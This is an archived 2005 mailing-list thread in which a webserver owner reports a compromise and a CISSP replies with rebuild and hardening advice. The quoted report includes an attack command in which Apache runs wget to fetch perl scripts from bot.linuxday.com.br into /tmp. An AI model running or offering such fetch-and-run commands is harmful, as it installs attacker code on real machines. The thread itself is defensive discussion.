Re: Server compromissed

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx
<paul@xxxxxxxxxxxxxxxxxxx> wrote:
> Apparently someone has hacked into my webserver.  And is installing perl
> scripts into he /tmp/ directory.  There usually named .linuxday* or
> .cinta* and a few other names as well.
> 
> >From what I can tell something is causing apache to run a command like "sh
> wget  bot.linuxday.com.br -O {the above mentioned files are than listed}"
> 
> sometimes the site is worm.linuxday.com.br
> 
> I'm curious if anyone has heard about this before.  I'm currently running
> Fedora 1  with all the latests security patches.

The only way to ensure your system is clean, and likely to remain clean, is to:

1. Do a bare metal install
2. Change all passwords to new strong passwords
3. Disable cleartext services, ftp, telnet, rsh, etc.
4. Disable root remote login (use su or sudo)
5. Restore your uncompromised data
6. etc.
I had to do this for a client and the next 3 days the intruder tried
to get back in.

-- 
Leonard Isham, CISSP 
Ostendo non ostento.


[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux